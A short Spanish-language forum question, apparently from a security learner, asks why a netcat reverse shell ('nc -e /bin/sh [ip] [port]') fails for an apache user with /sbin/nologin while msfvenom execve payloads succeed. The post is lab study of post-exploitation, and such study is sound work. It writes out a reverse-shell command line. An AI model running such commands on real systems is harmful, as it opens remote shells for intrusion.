Mientras practicaba la explotación en un laboratorio, conseguí la capacidad de ejecutar código php que me permitía ejecutar comandos del sistema a través de shell_exec en un servidor web. El usuario de apache tiene /sbin/nologin asignado como su shell.
He intentado usar el comando nc -e /bin/sh [ip] [port] pero falla. Usando netcat sin iniciar una shell, sin embargo, tiene éxito. Asumí que esto se debía a que tener el shell configurado en /no/login significa que no puedo iniciarlo. Sin embargo, si utilizo un ejecutable que realiza execve("/bin/sh") como los que se encuentran en los ejecutables de carga útil de msfvenom, tiene éxito.
Otra razón por la que asumí que el shell nologin no permite que un usuario inicie un shell interactivo es porque el intento del shell inverso netcat con un usuario que tiene /bin/sh configurado como su shell se realiza correctamente. Estoy confundido con la fase en la que se inicia la verificación de los permisos para iniciar un shell porque todavía puedo iniciarlo a través de ejecutables binarios.